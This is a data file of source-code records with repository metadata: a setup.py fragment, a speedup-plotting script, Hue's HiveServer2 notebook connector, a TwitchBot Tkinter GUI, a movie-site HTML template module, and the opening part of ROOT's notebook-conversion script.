Topic :: Software Development
"""
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('iminspector/__init__.py', 'rb') as fid:
for line in fid:
line = line.decode('utf-8')
if line.startswith('__version__'):
version = line.strip().split()[-1][1:-1]
break
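# e.g. a line "__version__ = '0.1.0'" in __init__.py yields version == '0.1.0'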
setup(
name=DISTNAME,
version=version,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
url=URL,
download_url=URL,
license=LICENSE,
platforms=["Any"],
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
classifiers=list(filter(None, CLASSIFIERS.split('\n'))),
requires=REQUIRES
)
|
mit
| -5,003,442,439,908,984,000
| 27.76
| 66
| 0.66129
| false
| 3.542857
| false
| false
| false
|
vnleonenko/Influenza
|
experiments/draw_speedup.py
|
1
|
2138
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Auxiliary script for paper, DGTS conference.
Draw speedup graph
"""
import json
import time
import matplotlib
import matplotlib.pyplot as plt
from common import RESULTS_PATH
SPEEDUP_FILE = RESULTS_PATH + '/dgts/speedup.json'
OUTPUT_FILE = RESULTS_PATH + '/dgts/speedup.pdf'
def main():
data = {}
with open(SPEEDUP_FILE) as f:
data = json.load(f)
speedups = dict()
for size, measurements in data.items():
if int(size) == 1:
            continue  # skip the trivial case
one_process = float(measurements["1"])
for process_count, seconds in measurements.items():
if int(process_count) == 1:
                continue  # speedup for 1 process is 1.0 by definition
try:
speedups[int(process_count)][int(size)] = one_process / float(seconds)
except KeyError:
speedups[int(process_count)] = {int(size): one_process / float(seconds)}
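    # e.g. a size that took 8.0 s on 1 process and 2.5 s on 4 processes
    # yields speedups[4][size] == 8.0 / 2.5 == 3.2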
fig = plt.figure(figsize=(10, 6)) # if smooth else (20, 12))
matplotlib.rcParams.update({'font.size': 20})
ax = fig.add_subplot(111)
sizes = next(iter(speedups.values())).keys()
x_axis = [i for i in range(min(sizes), max(sizes) + 1)]
colors = {'c', 'm', 'y', 'k'}
opt_color = {
2: 'b', 4: 'r', 8: 'g',
}
for process_count, measurements in speedups.items():
speedup_list = [measurements[key] for key in sorted(measurements.keys())]
if process_count not in opt_color:
opt_color[process_count] = colors.pop()
plt.plot(x_axis, speedup_list, opt_color[process_count] + "o-",
label='%d processes speedup' % (process_count),
linewidth=2.0)
plt.xlabel('Time periods')
plt.ylabel('Speedup')
plt.legend(loc='lower right', numpoints=1,
prop={'size': 16}, fancybox=True, shadow=True)
plt.grid()
plt.savefig(OUTPUT_FILE, dpi=450, format='pdf', bbox_inches='tight')
plt.show()
if __name__ == '__main__':
t0 = time.time()
main()
print('Total elapsed: %d seconds' % (time.time() - t0))
|
gpl-3.0
| 9,161,574,696,086,953,000
| 27.506667
| 88
| 0.581384
| false
| 3.415335
| false
| false
| false
|
fangxingli/hue
|
desktop/libs/notebook/src/notebook/connectors/hiveserver2.py
|
1
|
19836
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import re
import StringIO
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from desktop.conf import USE_DEFAULT_CONFIGURATION
from desktop.lib.conf import BoundConfig
from desktop.lib.exceptions import StructuredException
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import force_unicode
from desktop.models import DefaultConfiguration
from notebook.connectors.base import Api, QueryError, QueryExpired, OperationTimeout
LOG = logging.getLogger(__name__)
try:
from beeswax import data_export
from beeswax.api import _autocomplete, _get_sample_data
from beeswax.conf import CONFIG_WHITELIST as hive_settings
from beeswax.data_export import upload
from beeswax.design import hql_query, strip_trailing_semicolon, split_statements
from beeswax import conf as beeswax_conf
from beeswax.models import QUERY_TYPES, HiveServerQueryHandle, HiveServerQueryHistory, QueryHistory, Session
from beeswax.server import dbms
from beeswax.server.dbms import get_query_server_config, QueryServerException
from beeswax.views import _parse_out_hadoop_jobs
except ImportError, e:
LOG.warn('Hive and HiveServer2 interfaces are not enabled')
hive_settings = None
try:
from impala import api # Force checking if Impala is enabled
from impala.conf import CONFIG_WHITELIST as impala_settings
except ImportError, e:
LOG.warn("Impala app is not enabled")
impala_settings = None
DEFAULT_HIVE_ENGINE = 'mr'
def query_error_handler(func):
def decorator(*args, **kwargs):
try:
return func(*args, **kwargs)
except StructuredException, e:
message = force_unicode(str(e))
if 'timed out' in message:
raise OperationTimeout(e)
else:
raise QueryError(message)
except QueryServerException, e:
message = force_unicode(str(e))
if 'Invalid query handle' in message or 'Invalid OperationHandle' in message:
raise QueryExpired(e)
else:
raise QueryError(message)
return decorator
def is_hive_enabled():
return hive_settings is not None and type(hive_settings) == BoundConfig
def is_impala_enabled():
return impala_settings is not None and type(impala_settings) == BoundConfig
class HiveConfiguration(object):
APP_NAME = 'hive'
PROPERTIES = [
{
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Files"),
"key": "files",
"help_text": _("Add one or more files, jars, or archives to the list of resources."),
"type": "hdfs-files"
}, {
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Functions"),
"key": "functions",
"help_text": _("Add one or more registered UDFs (requires function name and fully-qualified class name)."),
"type": "functions"
}, {
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Settings"),
"key": "settings",
"help_text": _("Hive and Hadoop configuration properties."),
"type": "settings",
"options": [config.lower() for config in hive_settings.get()] if is_hive_enabled() and hasattr(hive_settings, 'get') else []
}
]
class ImpalaConfiguration(object):
APP_NAME = 'impala'
PROPERTIES = [
{
"multiple": True,
"defaultValue": [],
"value": [],
"nice_name": _("Settings"),
"key": "settings",
"help_text": _("Impala configuration properties."),
"type": "settings",
"options": [config.lower() for config in impala_settings.get()] if is_impala_enabled() else []
}
]
class HS2Api(Api):
@staticmethod
def get_properties(lang='hive'):
return ImpalaConfiguration.PROPERTIES if lang == 'impala' else HiveConfiguration.PROPERTIES
@query_error_handler
def create_session(self, lang='hive', properties=None):
application = 'beeswax' if lang == 'hive' else lang
session = Session.objects.get_session(self.user, application=application)
if session is None:
session = dbms.get(self.user, query_server=get_query_server_config(name=lang)).open_session(self.user)
response = {
'type': lang,
'id': session.id
}
if not properties:
config = None
if USE_DEFAULT_CONFIGURATION.get():
config = DefaultConfiguration.objects.get_configuration_for_user(app=lang, user=self.user)
if config is not None:
properties = config.properties_list
else:
properties = self.get_properties(lang)
response['properties'] = properties
if lang == 'impala':
impala_settings = session.get_formatted_properties()
http_addr = next((setting['value'] for setting in impala_settings if setting['key'].lower() == 'http_addr'), None)
response['http_addr'] = http_addr
return response
@query_error_handler
def close_session(self, session):
app_name = session.get('type')
session_id = session.get('id')
query_server = get_query_server_config(name=app_name)
response = {'status': -1, 'message': ''}
try:
filters = {'id': session_id, 'application': query_server['server_name']}
if not self.user.is_superuser:
filters['owner'] = self.user
session = Session.objects.get(**filters)
except Session.DoesNotExist:
response['message'] = _('Session does not exist or you do not have permissions to close the session.')
if session:
session = dbms.get(self.user, query_server).close_session(session)
response['status'] = 0
response['message'] = _('Session successfully closed.')
response['session'] = {'id': session_id, 'application': session.application, 'status': session.status_code}
return response
@query_error_handler
def execute(self, notebook, snippet):
db = self._get_db(snippet)
statement = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, statement['statement'], session)
try:
db.use(query.database)
handle = db.client.query(query)
except QueryServerException, ex:
raise QueryError(ex.message, handle=statement)
# All good
server_id, server_guid = handle.get()
response = {
'secret': server_id,
'guid': server_guid,
'operation_type': handle.operation_type,
'has_result_set': handle.has_result_set,
'modified_row_count': handle.modified_row_count,
'log_context': handle.log_context,
}
response.update(statement)
return response
@query_error_handler
def check_status(self, notebook, snippet):
response = {}
db = self._get_db(snippet)
handle = self._get_handle(snippet)
operation = db.get_operation_status(handle)
status = HiveServerQueryHistory.STATE_MAP[operation.operationState]
if status.index in (QueryHistory.STATE.failed.index, QueryHistory.STATE.expired.index):
if operation.errorMessage and 'transition from CANCELED to ERROR' in operation.errorMessage: # Hive case on canceled query
raise QueryExpired()
else:
raise QueryError(operation.errorMessage)
response['status'] = 'running' if status.index in (QueryHistory.STATE.running.index, QueryHistory.STATE.submitted.index) else 'available'
return response
@query_error_handler
def fetch_result(self, notebook, snippet, rows, start_over):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
results = db.fetch(handle, start_over=start_over, rows=rows)
# No escaping...
return {
'has_more': results.has_more,
'data': results.rows(),
'meta': [{
'name': column.name,
'type': column.type,
'comment': column.comment
} for column in results.data_table.cols()],
'type': 'table'
}
@query_error_handler
def fetch_result_metadata(self):
pass
@query_error_handler
def cancel(self, notebook, snippet):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
db.cancel_operation(handle)
return {'status': 0}
@query_error_handler
def get_log(self, notebook, snippet, startFrom=None, size=None):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
return db.get_log(handle, start_over=startFrom == 0)
@query_error_handler
def close_statement(self, snippet):
if snippet['type'] == 'impala':
from impala import conf as impala_conf
if (snippet['type'] == 'hive' and beeswax_conf.CLOSE_QUERIES.get()) or (snippet['type'] == 'impala' and impala_conf.CLOSE_QUERIES.get()):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
db.close_operation(handle)
return {'status': 0}
else:
return {'status': -1} # skipped
@query_error_handler
def download(self, notebook, snippet, format):
try:
db = self._get_db(snippet)
handle = self._get_handle(snippet)
# Test handle to verify if still valid
db.fetch(handle, start_over=True, rows=1)
return data_export.download(handle, format, db, id=snippet['id'])
except Exception, e:
title = 'The query result cannot be downloaded.'
LOG.exception(title)
if hasattr(e, 'message') and e.message:
message = e.message
else:
message = e
raise PopupException(_(title), detail=message)
@query_error_handler
def progress(self, snippet, logs):
if snippet['type'] == 'hive':
match = re.search('Total jobs = (\d+)', logs, re.MULTILINE)
total = int(match.group(1)) if match else 1
started = logs.count('Starting Job')
ended = logs.count('Ended Job')
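      # e.g. logs containing 'Total jobs = 4' with three 'Starting Job' and
      # two 'Ended Job' lines yield int((3 + 2) * 100 / (4 * 2)) == 62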
progress = int((started + ended) * 100 / (total * 2))
return max(progress, 5) # Return 5% progress as a minimum
elif snippet['type'] == 'impala':
match = re.findall('(\d+)% Complete', logs, re.MULTILINE)
# Retrieve the last reported progress percentage if it exists
return int(match[-1]) if match and isinstance(match, list) else 0
else:
return 50
@query_error_handler
def get_jobs(self, notebook, snippet, logs):
jobs = []
if snippet['type'] == 'hive':
engine = self._get_hive_execution_engine(notebook, snippet)
jobs_with_state = _parse_out_hadoop_jobs(logs, engine=engine, with_state=True)
jobs = [{
'name': job.get('job_id', ''),
'url': reverse('jobbrowser.views.single_job', kwargs={'job': job.get('job_id', '')}),
'started': job.get('started', False),
'finished': job.get('finished', False)
} for job in jobs_with_state]
return jobs
@query_error_handler
def autocomplete(self, snippet, database=None, table=None, column=None, nested=None):
db = self._get_db(snippet)
return _autocomplete(db, database, table, column, nested)
@query_error_handler
def get_sample_data(self, snippet, database=None, table=None, column=None):
db = self._get_db(snippet)
return _get_sample_data(db, database, table, column)
@query_error_handler
def explain(self, notebook, snippet):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
try:
explanation = db.explain(query)
except QueryServerException, ex:
raise QueryError(ex.message)
return {
'status': 0,
'explanation': explanation.textual,
'statement': query.get_query_statement(0),
}
@query_error_handler
def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
db = self._get_db(snippet)
handle = self._get_handle(snippet)
upload(target_file, handle, self.request.user, db, self.request.fs)
return '/filebrowser/view=%s' % target_file
def export_data_as_table(self, notebook, snippet, destination):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
if 'select' not in query.hql_query.strip().lower():
raise Exception(_('Only SELECT statements can be saved. Provided statement: %(query)s') % {'query': query.hql_query})
database = snippet.get('database') or 'default'
table = destination
if '.' in table:
database, table = table.split('.', 1)
db.use(query.database)
hql = 'CREATE TABLE `%s`.`%s` AS %s' % (database, table, query.hql_query)
success_url = reverse('metastore:describe_table', kwargs={'database': database, 'table': table})
return hql, success_url
def export_large_data_to_hdfs(self, notebook, snippet, destination):
db = self._get_db(snippet)
response = self._get_current_statement(db, snippet)
session = self._get_session(notebook, snippet['type'])
query = self._prepare_hql_query(snippet, response.pop('statement'), session)
if 'select' not in query.hql_query.strip().lower():
raise Exception(_('Only SELECT statements can be saved. Provided statement: %(query)s') % {'query': query.hql_query})
db.use(query.database)
hql = "INSERT OVERWRITE DIRECTORY '%s' %s" % (destination, query.hql_query)
success_url = '/filebrowser/view=%s' % destination
return hql, success_url
def upgrade_properties(self, lang='hive', properties=None):
upgraded_properties = copy.deepcopy(self.get_properties(lang))
# Check that current properties is a list of dictionary objects with 'key' and 'value' keys
if not isinstance(properties, list) or \
not all(isinstance(prop, dict) for prop in properties) or \
not all('key' in prop for prop in properties) or not all('value' in prop for prop in properties):
LOG.warn('Current properties are not formatted correctly, will replace with defaults.')
return upgraded_properties
valid_props_dict = dict((prop["key"], prop) for prop in upgraded_properties)
curr_props_dict = dict((prop['key'], prop) for prop in properties)
# Upgrade based on valid properties as needed
if set(valid_props_dict.keys()) != set(curr_props_dict.keys()):
settings = next((prop for prop in upgraded_properties if prop['key'] == 'settings'), None)
if settings is not None and isinstance(properties, list):
settings['value'] = properties
else: # No upgrade needed so return existing properties
upgraded_properties = properties
return upgraded_properties
def _get_session(self, notebook, type='hive'):
session = next((session for session in notebook['sessions'] if session['type'] == type), None)
return session
def _get_hive_execution_engine(self, notebook, snippet):
# Get hive.execution.engine from snippet properties, if none, then get from session
properties = snippet['properties']
settings = properties.get('settings', [])
if not settings:
session = self._get_session(notebook, 'hive')
if not session:
LOG.warn('Cannot get jobs, failed to find active HS2 session for user: %s' % self.user.username)
else:
properties = session['properties']
settings = next((prop['value'] for prop in properties if prop['key'] == 'settings'), None)
if settings:
engine = next((setting['value'] for setting in settings if setting['key'] == 'hive.execution.engine'), DEFAULT_HIVE_ENGINE)
else:
engine = DEFAULT_HIVE_ENGINE
return engine
def _get_statements(self, hql_query):
hql_query = strip_trailing_semicolon(hql_query)
hql_query_sio = StringIO.StringIO(hql_query)
statements = []
for (start_row, start_col), (end_row, end_col), statement in split_statements(hql_query_sio.read()):
statements.append({
'start': {
'row': start_row,
'column': start_col
},
'end': {
'row': end_row,
'column': end_col
},
'statement': strip_trailing_semicolon(statement.strip())
})
return statements
def _get_current_statement(self, db, snippet):
    # Multi-query support: advance to the next statement unless this is the
    # first statement or we have arrived at the last one
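    # e.g. a snippet 'SELECT 1; SELECT 2' runs statement_id 0 first with
    # has_more_statements=True, then statement_id 1 on the next execute() call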
statement_id = snippet['result']['handle'].get('statement_id', 0)
statements_count = snippet['result']['handle'].get('statements_count', 1)
if snippet['result']['handle'].get('has_more_statements'):
try:
handle = self._get_handle(snippet)
        db.close_operation(handle)  # Always close the handle from the previous statement of a multi-query
except:
        LOG.warn('Could not close the previous multi-query statement')
statement_id += 1
else:
statement_id = 0
statements = self._get_statements(snippet['statement'])
resp = {
'statement_id': statement_id,
'has_more_statements': statement_id < len(statements) - 1,
'statements_count': len(statements)
}
if statements_count != len(statements):
statement_id = 0
resp.update(statements[statement_id])
return resp
def _prepare_hql_query(self, snippet, statement, session):
settings = snippet['properties'].get('settings', None)
file_resources = snippet['properties'].get('files', None)
functions = snippet['properties'].get('functions', None)
properties = session['properties'] if session else []
# Get properties from session if not defined in snippet
if not settings:
settings = next((prop['value'] for prop in properties if prop['key'] == 'settings'), None)
if not file_resources:
file_resources = next((prop['value'] for prop in properties if prop['key'] == 'files'), None)
if not functions:
functions = next((prop['value'] for prop in properties if prop['key'] == 'functions'), None)
database = snippet.get('database') or 'default'
return hql_query(
statement,
query_type=QUERY_TYPES[0],
settings=settings,
file_resources=file_resources,
functions=functions,
database=database
)
def get_select_star_query(self, snippet, database, table):
db = self._get_db(snippet)
table = db.get_table(database, table)
return db.get_select_star_query(database, table)
def _get_handle(self, snippet):
snippet['result']['handle']['secret'], snippet['result']['handle']['guid'] = HiveServerQueryHandle.get_decoded(snippet['result']['handle']['secret'], snippet['result']['handle']['guid'])
for key in snippet['result']['handle'].keys():
if key not in ('log_context', 'secret', 'has_result_set', 'operation_type', 'modified_row_count', 'guid'):
snippet['result']['handle'].pop(key)
return HiveServerQueryHandle(**snippet['result']['handle'])
def _get_db(self, snippet):
if snippet['type'] == 'hive':
name = 'beeswax'
elif snippet['type'] == 'impala':
name = 'impala'
else:
name = 'spark-sql'
return dbms.get(self.user, query_server=get_query_server_config(name=name))
|
apache-2.0
| -1,149,335,945,032,415,200
| 31.518033
| 190
| 0.661877
| false
| 3.789112
| true
| false
| false
|
LaurensScheldeman/TwitchBot
|
src/lib/gui.py
|
1
|
2462
|
import string
from datetime import datetime
import Tkinter as tk
import ttk
import tkFont
import webbrowser
import socket
import src.lib.fileHandler as fileHandler
import src.lib.twitchHandler as twitchHandler
from src.lib.irc import irc as irc_
from src.lib.variables import global_variables
from src.lib.gui_botsettings import Botsettings
from src.lib.gui_commands import Commands
class GUI():
def __init__(self):
# GUI
self.__ROOT = tk.Tk()
self.__ROOT.withdraw() # Makes gui invisible
# Loading window
loading = tk.Tk()
loading.wm_title(' ')
loading.iconbitmap('src/images/santaBot_icon.ico')
tk.Label(loading, text='Loading SantaBot...', padx=20, pady=10).grid(row=1,column=0)
loading.update()
self.__ROOT.wm_title('SantaBot v0.2.0')
self.__ROOT.iconbitmap('src/images/santaBot_icon.ico')
self.__active = True
self.__ROOT.protocol("WM_DELETE_WINDOW", self.__quit)
self.__notebook = ttk.Notebook(self.__ROOT, width=1120, height=690)
# Tab1: Botsettings
self.__botsettings = Botsettings(self.__notebook)
self.__config = fileHandler.read_json('data/SantaBot/config.json')
# Tab2: commands
self.__commands = Commands(self.__notebook)
self.__notebook.grid(row=1, column=0, columnspan=10, sticky='wen', padx=15, pady=15)
# Buttons
button_frame = tk.Frame(self.__ROOT)
button_frame.grid(row=2, column = 9)
tk.Button(button_frame, text='Save changes', command=self.__save, width=13).grid(row=0, column=0, padx=5, pady=(0,20))
tk.Button(button_frame, text='Quit', command=self.__quit, width=13).grid(row=0, column=1, padx=5, pady=(0,20))
# Save initial state
self.__save()
self.__ROOT.deiconify() # Makes gui visible
loading.destroy() # Delete loading window
def update(self):
self.__ROOT.update() # Update the GUI itself
def check_active(self):
return self.__active
def add_chatmessage(self, user, message):
self.__botsettings.add_chatmessage(user, message)
def get_irc_connection_status(self):
return self.__botsettings.irc_connection
def __save(self):
# config.json
self.__botsettings.save()
# config_commands.json
self.__commands.save()
def __quit(self):
self.__active = False
self.__ROOT.destroy()
|
gpl-3.0
| 2,424,998,428,401,631,000
| 28.662651
| 126
| 0.632006
| false
| 3.62592
| false
| false
| false
|
janist7/udacity-movie-site-development
|
python/templates/template_main.py
|
1
|
2546
|
"""Contains parts of the main template - head, nav and footer"""
#Uses code from this repository:
#https://github.com/adarsh0806/ud036_StarterCode/blob/master/fresh_tomatoes.py
def get_template():
'''Contains main template'''
# Styles and scripting for the page
main_page_head = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="https://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<!-- Roboto -->
<link href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i" rel="stylesheet">
<!-- Css/Js -->
<link rel="stylesheet" href="css/main.css">
<script src="js/main.js"></script>
</head>
'''
# Page navigation
main_page_navigation = '''
<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.html">Movie Trailers</a>
</div>
<div class="collapse navbar-collapse" id="myNavbar">
<ul class="nav navbar-nav">
<li><a class="navbar-nav" href="index.html">Main</a></li>
<li><a class="navbar-nav" href="fresh_tomatoes_upload.html">Upload Movie</a></li>
</ul>
</div>
</div>
</nav>
'''
# Page footer
main_page_footer = '''
<footer class="container-fluid bg-4 text-center">
        <p>© Copyright: Janis Tidrikis</p>
</footer>
'''
main_template_subparts = {
"main_page_head":main_page_head,
"main_page_navigation":main_page_navigation,
"main_page_footer":main_page_footer
}
return main_template_subparts
|
gpl-3.0
| -7,364,092,432,295,013,000
| 41.433333
| 139
| 0.584446
| false
| 3.41745
| false
| false
| false
|
lgiommi/root
|
documentation/doxygen/converttonotebook.py
|
1
|
35395
|
#!/usr/bin/env python
# Author: Pau Miquel i Mir <pau.miquel.mir@cern.ch> <pmm1g15@soton.ac.uk>>
# Date: July, 2016
#
# DISCLAIMER: This script is a prototype and a work in progress. Indeed, it is possible that
# it may not work for certain tutorials, and that it, or the tutorial, might need to be
# tweaked slightly to ensure full functionality. Please do not hesistate to email the author
# with any questions or with examples that do not work.
#
# HELP IT DOESN'T WORK: Two possible solutions:
# 1. Check that all the types returned by the tutorial are in the gTypesList. If they aren't,
# simply add them.
# 2. If the tutorial takes a long time to execute (more than 90 seconds), add the name of the
# tutorial to the list of long tutorials listLongTutorials, in the function findTimeout.
#
# REQUIREMENTS: This script needs jupyter to be properly installed, as it uses the python
# package nbformat and calls the shell commands `jupyter nbconvert` and `jupyter trust`. The
# rest of the packages used should be included in a standard installation of python. The script
# is intended to be run on a UNIX based system.
#
#
# FUNCTIONING:
# -----------
# The converttonotebook script creates Jupyter notebooks from raw C++ or python files.
# Particularly, it is well suited for converting the ROOT tutorials found in the ROOT
# repository.
#
# The script should be called from bash with the following format:
# python /path/to/script/converttonotebook.py /path/to/<macro>.C /path/to/outdir
#
# Indeed the script takes two arguments, the path to the macro and the path to the directory
# where the notebooks will be created
#
# The script's general functioning is as follows. The macro to be converted is imported as a string.
# A series of modifications are made to this string, for instance delimiting where markdown and
# code cells begin and end. Then, this string is converted into ipynb format using functions
# from the nbformat package. Finally, the notebook is executed and output.
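#
# For example, a C++ comment line "// Draw the histogram" is rewritten as
#
#     # <markdowncell>
#     # Draw the histogram
#     # <codecell>
#
# before the string is handed to the nbformat reader.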
#
# For converting python tutorials it is fairly straightforward. It extracts the decription and
# author information from the header and then removes it. It also converts any comment at the
# beginning of a line into a Markdown cell.
#
# For C++ files the process is slightly more complex. The script separates the functions from the
# main code. The main function is identified as it has the same name as the macro file. The other
# functions are considered helper functions. The main function is "extracted" and presented as main code.
# The helper functions are placed in their own code cell with the %%cpp -d magic to enable function
# definition. Finally, as with Python macros, relevant information is extracted from the header, and
# newline comments are converted into Markdown cells (unless they are in helper functions).
#
# The script creates an .ipynb version of the macro, with the full output included.
# The files are named:
# <macro>.<C or py>.nbconvert.ipynb
#
# It is called by filter.cxx, which in turn is called by doxygen when processing any file
# in the ROOT repository. filter.cxx only calls converttonotebook.py when the string \notebook
# is found in the header of the tutorial, but this script checks for its presence as well.
import re
import os
import sys
import json
import time
import doctest
import textwrap
import subprocess
from nbformat import v3, v4
from datetime import datetime, date
# List of types that will be considered when looking for a C++ function. If a macro returns a
# type not included on the list, the regular expression will not match it, and thus the function
# will not be properly defined. Thus, any other type returned by function must be added to this list
# for the script to work correctly.
gTypesList = ["void", "int", "Int_t", "TF1", "string", "bool", "double", "float", "char",
"TCanvas", "TTree", "TString", "TSeqCollection", "Double_t", "TFile", "Long64_t", "Bool_t", "TH1",
"RooDataSet", "RooWorkspace" , "HypoTestInverterResult" , "TVectorD" , "TArrayF", "UInt_t"]
# -------------------------------------
# -------- Function definitions --------
# -------------------------------------
def unindenter(string, spaces = 3):
"""
    Returns string with each line unindented by [spaces] spaces (3 by default).
    If a line isn't indented that far, it stays the same.
>>> unindenter(" foobar")
'foobar\\n'
>>> unindenter("foobar")
'foobar\\n'
>>> unindenter('''foobar
... foobar
... foobar''')
'foobar\\nfoobar\\nfoobar\\n'
"""
newstring = ''
lines = string.splitlines()
for line in lines:
if line.startswith(spaces*' '):
newstring += (line[spaces:] + "\n")
else:
newstring += (line + "\n")
return newstring
def readHeaderPython(text):
"""
Extract author and description from header, eliminate header from text. Also returns
notebook boolean, which is True if the string \notebook is present in the header
Also determine options (-js, -nodraw, -header) passed in \notebook command, and
return their booleans
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, False, False, False)
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook -js
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, True, False, False)
>>> readHeaderPython('''## \\file
... ## \\ingroup tutorials
... ## \\\\notebook -nodraw
... ## This is the description of the tutorial
... ##
... ## \\macro_image
... ## \\macro_code
... ##
... ## \\\\author John Brown
... def tutorialfuncion()''')
('def tutorialfuncion()\\n', 'This is the description of the tutorial\\n\\n\\n', 'John Brown', True, False, True, False)
"""
lines = text.splitlines()
description = ''
author = ''
isNotebook = False
isJsroot = False
nodraw = False
needsHeaderFile = False
for i, line in enumerate(lines):
if line.startswith("## \\aut"):
author = line[11:]
elif line.startswith("## \\note"):
isNotebook = True
if "-js" in line:
isJsroot = True
if "-nodraw" in line:
nodraw = True
if "-header" in line:
needsHeaderFile = True
elif line.startswith("##"):
if not line.startswith("## \\") and isNotebook:
description += (line[3:] + '\n')
else:
break
newtext = ''
for line in lines[i:]:
newtext += (line + "\n")
return newtext, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile
def pythonComments(text):
"""
Converts comments delimited by # or ## and on a new line into a markdown cell.
For python files only
>>> pythonComments('''## This is a
... ## multiline comment
... def function()''')
'# <markdowncell>\\n## This is a\\n## multiline comment\\n# <codecell>\\ndef function()\\n'
>>> pythonComments('''def function():
... variable = 5 # Comment not in cell
... # Comment also not in cell''')
'def function():\\n variable = 5 # Comment not in cell\\n # Comment also not in cell\\n'
"""
text = text.splitlines()
newtext = ''
inComment = False
for i, line in enumerate(text):
if line.startswith("#") and not inComment: # True if first line of comment
inComment = True
newtext += "# <markdowncell>\n"
newtext += (line + "\n")
elif inComment and not line.startswith("#"): # True if first line after comment
inComment = False
newtext += "# <codecell>\n"
newtext += (line+"\n")
else:
newtext += (line+"\n")
return newtext
def pythonMainFunction(text):
lines = text.splitlines()
functionContentRe = re.compile('def %s\\(.*\\):' % tutName , flags = re.DOTALL | re.MULTILINE)
newtext = ''
inMainFunction = False
hasMainFunction = False
for line in lines:
if hasMainFunction:
if line.startswith("""if __name__ == "__main__":""") or line.startswith("""if __name__ == '__main__':"""):
break
match = functionContentRe.search(line)
if inMainFunction and not line.startswith(" ") and line != "":
inMainFunction = False
if match:
inMainFunction = True
hasMainFunction = True
else:
if inMainFunction:
newtext += (line[4:] + '\n')
else:
newtext += (line + '\n')
return newtext
def readHeaderCpp(text):
"""
Extract author and description from header, eliminate header from text. Also returns
notebook boolean, which is True if the string \notebook is present in the header
Also determine options (-js, -nodraw, -header) passed in \notebook command, and
return their booleans
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, False, False, False)
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook -js
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, True, False, False)
>>> readHeaderCpp('''/// \\file
... /// \\ingroup tutorials
... /// \\\\notebook -nodraw
... /// This is the description of the tutorial
... ///
... /// \\macro_image
... /// \\macro_code
... ///
... /// \\\\author John Brown
... void tutorialfuncion(){}''')
('void tutorialfuncion(){}\\n', '# This is the description of the tutorial\\n# \\n# \\n', 'John Brown', True, False, True, False)
"""
lines = text.splitlines()
description = ''
author = ''
isNotebook = False
isJsroot = False
nodraw = False
needsHeaderFile = False
for i, line in enumerate(lines):
if line.startswith("/// \\aut"):
author = line[12:]
if line.startswith("/// \\note"):
isNotebook = True
if "-js" in line:
isJsroot = True
if "-nodraw" in line:
nodraw = True
if "-header" in line:
needsHeaderFile = True
